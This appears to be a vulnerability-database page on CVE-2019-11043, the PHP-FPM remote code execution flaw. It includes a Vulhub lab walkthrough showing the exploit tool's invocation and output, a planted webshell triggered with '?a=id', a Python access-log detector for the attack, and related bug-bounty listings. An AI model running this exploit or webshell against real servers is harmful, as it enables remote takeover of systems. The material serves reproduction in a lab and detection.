9.8 / 10

In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11, in certain configurations of the FPM setup, it is possible to cause the FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.

Weakness: Out-of-bounds Write

The software writes data past the end, or before the beginning, of the intended buffer.

Published: 2019-10-28


CVE-2019-11043 Exploits (25)


CVE-2019-11043 Vulnerable Docker Environment

Vulhub is an open-source collection of Docker-ized vulnerable environments. No pre-existing knowledge of Docker is required, just execute two simple commands and you have a vulnerable environment.


PHP-FPM Remote Command Execution (CVE-2019-11043)

A PHP remote code execution 0-day was discovered in Real World CTF 2019 Quals.

Real World CTF 2019 Quals is a CTF challenge which was organized by Chaitin Tech in China.



Environment setup

Start a vulnerable PHP server with the following command:

docker-compose up -d

After the environment is started, you can see the default page at http://your-ip:8080/index.php.

Vulnerability Reproduction

Use this tool to reproduce the vulnerability:

$ go run . "http://your-ip:8080/index.php"
2019/10/23 19:41:00 Base status code is 200
2019/10/23 19:41:00 Status code 502 for qsl=1795, adding as a candidate
2019/10/23 19:41:00 The target is probably vulnerable. Possible QSLs: [1785 1790 1795]
2019/10/23 19:41:02 Attack params found: --qsl 1790 --pisos 152 --skip-detect
2019/10/23 19:41:02 Trying to set "session.auto_start=0"...
2019/10/23 19:41:02 Detect() returned attack params: --qsl 1790 --pisos 152 --skip-detect <-- REMEMBER THIS
2019/10/23 19:41:02 Performing attack using php.ini settings...
2019/10/23 19:41:02 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/23 19:41:02 Trying to cleanup /tmp/a...
2019/10/23 19:41:02 Done!

The output above shows that the process finished successfully.

A webshell is written in the background of PHP-FPM. Visit http://your-ip:8080/index.php?a=id to trigger the RCE.

Note that only some of the PHP-FPM child processes are polluted, so you may need to try the command a few times before it executes.
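The run above leaves a recognisable trail in a web server access log: a burst of requests with very long query strings, at least one answered with 502, followed by short requests carrying the `a` parameter. The following detector is an added example, not part of the Vulhub README or the tool. It assumes combined-format access logs; the thresholds, function names and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumed thresholds, not taken from the page: tune them to your own traffic.
LONG_QUERY = 1500   # the tool output above reports query string lengths near 1790
MIN_PROBES = 3      # long-query requests from one client before it counts as probing

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return {client_ip: finding} for clients matching the probe-then-command pattern."""
    stats = defaultdict(lambda: {"long": 0, "long_502": 0, "cmd": []})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        if ".php" not in url.path:
            continue
        s = stats[ip]
        if len(url.query) >= LONG_QUERY:
            s["long"] += 1
            s["long_502"] += status == 502   # gateway error during probing
        elif s["long"] >= MIN_PROBES and "a" in parse_qs(url.query):
            # Short request carrying the 'a' parameter after a probing burst.
            s["cmd"].append(parse_qs(url.query)["a"][0])
    findings = {}
    for ip, s in stats.items():
        if s["long"] >= MIN_PROBES and s["long_502"]:
            findings[ip] = {"probes": s["long"], "gateway_errors": s["long_502"],
                            "commands": s["cmd"],
                            "severity": "high" if s["cmd"] else "medium"}
    return findings

def sample_log():
    """Constructed access-log lines; addresses are from documentation ranges."""
    def row(ip, target, status):
        return f'{ip} - - [23/Oct/2019:19:41:00 +0000] "GET {target} HTTP/1.1" {status} 0 "-" "-"'
    rows = [row("198.51.100.9", "/index.php?page=2", 200)]
    rows += [row("203.0.113.7", "/index.php?" + "Q" * n, 502 if n == 1795 else 200)
             for n in (1785, 1790, 1795)]
    rows.append(row("203.0.113.7", "/index.php?a=id", 200))
    rows.append(row("198.51.100.9", "/index.php?a=1", 200))   # benign use of 'a'
    return rows

if __name__ == "__main__":
    for ip, finding in scan(sample_log()).items():
        print(ip, finding)
```

A "high" finding means the `a` parameter was used after probing and the host should be treated as possibly compromised; "medium" means probing with gateway errors only.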

Bug Bounty

Nextcloud: Docker image with FPM is vulnerable to CVE-2019-11043

submitted by beched over 1 year ago
publicly disclosed 11 months ago

PHP (IBB): CVE-2019-11043: a buffer underflow in fpm_main.c can lead to RCE in php-fpm

submitted by neex over 1 year ago
publicly disclosed 3 months ago
